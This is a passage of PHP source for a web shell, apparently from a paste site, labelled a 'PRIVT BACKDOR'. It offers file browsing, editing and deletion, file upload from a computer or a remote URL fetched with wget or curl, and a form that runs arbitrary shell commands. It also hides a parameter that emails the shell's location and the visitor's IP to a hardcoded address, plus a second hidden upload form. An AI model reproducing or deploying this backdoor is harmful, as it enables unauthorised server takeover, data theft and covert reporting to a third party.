- if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time());
- if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?>
- <form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post">
- <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content">
- <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
- <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']);
- $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?>
- <form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post">
- <table class="tabnet" style="width:320px;padding:0 1px;">
- <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr>
- <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload">
- <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
- <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td>
- <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table>
- <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
- <?php if(isset($_GET['jak']) && ($_GET['jak'] == '?')){ @ini_set('output_buffering', 0); @ini_set('display_errors', 0); set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type: text/html; charset=UTF-8'); $goks= 'yamaap92@gmail.com'; $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]"; mail($goks, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]"); }?>
- <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?> <form action="?y=<?php echo $pwd; ?>&x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
- <tr><td colspan="2"><?php echo $prompt; ?> <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:6%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?>
- <p><center><div class="info">-=[ IDBTE4M PRIVT BACKDOR Recoded By JakRapp ]=-</div>
- <?php if (isset($_GET['jakrapp'])) {
- echo "<body bgcolor=white>
- <font color=black size=3>";
- echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
- <label for=\"file\"></label>
- <input type=\"file\" name=\"file\" id=\"file\" />
- <br />
- <input type=\"submit\" name=\"submit\" value=\"UPLOAD\">
- </form>";
- if ($_FILES["file"]["error"] > 0) {
- echo "Error: " . $_FILES["file"]["error"] . "<br />";
- } else {
- echo "Upload: " . $_FILES["file"]["name"] . "<br />";
- echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
- echo "Stored in: " . $_FILES["file"]["tmp_name"];
- }
- if (file_exists("" . $_FILES["file"]["name"])) {
- echo $_FILES["file"]["name"] . " already exists. ";
- } else {
- move_uploaded_file($_FILES["file"]["tmp_name"], "" . $_FILES["file"]["name"]);
- echo "<br>Stored in: " . "" . $_FILES["file"]["name"];
- echo "<hr>";
- }
- }
Add Comment
Please, Sign In to add comment